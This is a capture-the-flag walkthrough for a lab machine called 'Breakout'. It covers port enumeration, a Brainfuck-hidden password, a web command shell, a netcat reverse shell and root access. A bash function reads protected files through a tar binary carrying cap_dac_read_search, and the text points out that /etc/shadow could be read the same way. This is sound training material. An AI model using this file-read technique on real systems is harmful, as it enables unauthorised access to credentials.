Breakout
Difficulty: Easy
Enumeration
nmap
We start by scanning with nmap using the following command line. It scans all TCP ports, tries to detect the service running on each open port, determines its version and runs the default detection scripts.
whatweb
We then use whatweb to identify the technologies and platform behind the website.
View Page Source
Opening the site in a browser confirms that Apache2 is running.
Viewing the page source reveals a pleasant surprise.
This is a program written in Brainfuck, an esoteric language with only eight single-character instructions (< > + - . , [ ]) that operate on a tape of byte cells. It is a common way of hiding a string in plain sight.
Running it through an online interpreter gives the following output:
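Rather than pasting an unknown payload into a third-party website, the program can be decoded locally. The interpreter below is an added example written for this page, not code from the original write-up or from the machine. It precomputes bracket matches (so unbalanced payloads fail loudly), wraps cells at 8 bits and caps the step count so a hostile program cannot spin forever. The sample program it runs is the well-known "Hello World!" program, constructed here as test input; it is not the payload found in the page source.

```python
"""Minimal Brainfuck interpreter (added example, not the write-up's own code).

Decode a Brainfuck payload offline: paste the program into `code` and call
run_brainfuck(code). Cells are unsigned bytes, the tape is bounded, and a
step limit guards against non-terminating input.
"""

# Constructed sample input: the classic "Hello World!" program, NOT the
# payload from the page source.
HELLO_WORLD = (
    "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]"
    ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."
)


def build_jump_table(code: str) -> dict:
    """Map every '[' to its matching ']' and back; raise on unbalanced brackets."""
    table, stack = {}, []
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            table[i], table[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return table


def run_brainfuck(code: str, stdin: str = "", tape_size: int = 30000,
                  max_steps: int = 10_000_000) -> str:
    """Execute `code` and return everything it writes with '.' as a string."""
    # Anything that is not one of the eight instructions is a comment.
    code = "".join(c for c in code if c in "<>+-.,[]")
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    ptr = pc = steps = 0
    inp = iter(stdin.encode())
    out = bytearray()

    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; payload may loop forever")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("pointer ran off the right end of the tape")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("pointer ran off the left end of the tape")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF   # wrap like an unsigned byte
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = next(inp, 0)              # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]                        # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]                        # back to the matching '['
        pc += 1

    # latin-1 maps every byte to one character, so non-ASCII output survives.
    return out.decode("latin-1")


if __name__ == "__main__":
    print(run_brainfuck(HELLO_WORLD), end="")
```

To decode the payload from the page, copy the string out of the HTML comment into the `code` argument; the result is the same text the online interpreter produced.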
enum4linux
With enum4linux we collect information about users and SMB shares on the system.
This reveals a local user.
Exploitation
Now that we have a candidate username and the string decoded from the Brainfuck program, let's try them as credentials on port 20000.
User: cyber => Pass: .2uqPEfj3D<P'a-3
The login succeeds. After navigating through the different sections, we reach the Command Shell and confirm that it executes the commands we type and returns their output.
From there we follow the usual procedure to obtain a reverse shell with netcat.
We find user.txt and read it with cat.
To look for privilege escalation vectors we run getcap -r / 2>/dev/null, which recursively lists every executable on the filesystem that carries Linux file capabilities (the redirect discards the permission-denied noise from directories we cannot enter).
The tar binary in /home/cyber is flagged cap_dac_read_search=ep: the capability is both permitted and effective, so this copy of tar bypasses file read permission checks and directory read and execute (search) checks. In practice, anyone who can run it can archive any file on the system, regardless of its mode bits.
Privilege Escalation
A little more enumeration shows an old password backup, /var/backups/.old_pass.bak, which our user does not have permission to read.
The following command line uses the capability-bearing tar to create an archive named pass.tar containing /var/backups/.old_pass.bak; thanks to cap_dac_read_search, tar reads the file even though we cannot. This is the misconfiguration we abuse: tar itself is not vulnerable, the capability is what grants the access.
We extract the archive with the following line, read the recovered password and use it to get root.
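The archive-and-extract step above, wrapped in a reusable function as an added example (this is not the write-up's own command line). It assumes GNU tar and takes the path of the capability-bearing binary as an optional second argument; the default `tar` exists only so the function can be exercised on a readable file. The caveat worth knowing is in the comments: GNU tar strips the leading `/` from member names, so the extracted copy lands at a relative path, not back in /var/backups.

```bash
#!/usr/bin/env bash
# Added example: read a file we cannot open by routing it through a tar binary
# that carries cap_dac_read_search. Not the write-up's own commands.

read_via_tar() {
    local target="$1"            # file to read, e.g. /var/backups/.old_pass.bak
    local tar_bin="${2:-tar}"    # capability-bearing tar, e.g. /home/cyber/tar
    local work
    work=$(mktemp -d) || return 1

    # Informative only: show the capability if getcap is installed.
    if command -v getcap >/dev/null 2>&1; then
        getcap "$(command -v "$tar_bin")" >&2 2>/dev/null
    fi

    # cap_dac_read_search lets tar open the target regardless of its mode bits.
    # GNU tar strips the leading '/' from member names and warns about it on
    # stderr; the warning is silenced here so only file content reaches stdout.
    "$tar_bin" -cf "$work/pass.tar" "$target" 2>/dev/null || { rm -rf "$work"; return 1; }

    # Extract into our own scratch directory: the copy is owned by us, so it
    # is readable without any capability at $work/<path without leading />.
    "$tar_bin" -xf "$work/pass.tar" -C "$work" || { rm -rf "$work"; return 1; }
    cat "$work/${target#/}"
    rm -rf "$work"
}

# On the box, with the path named in the write-up:
# read_via_tar /var/backups/.old_pass.bak /home/cyber/tar
```

The same trick works for any file the capability lets tar read, such as /etc/shadow, so when you see cap_dac_read_search on a world-executable binary during a pentest, treat it as a full read primitive over the filesystem and report it as such.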
Flags
user.txt
root.txt
With this we have successfully completed this machine.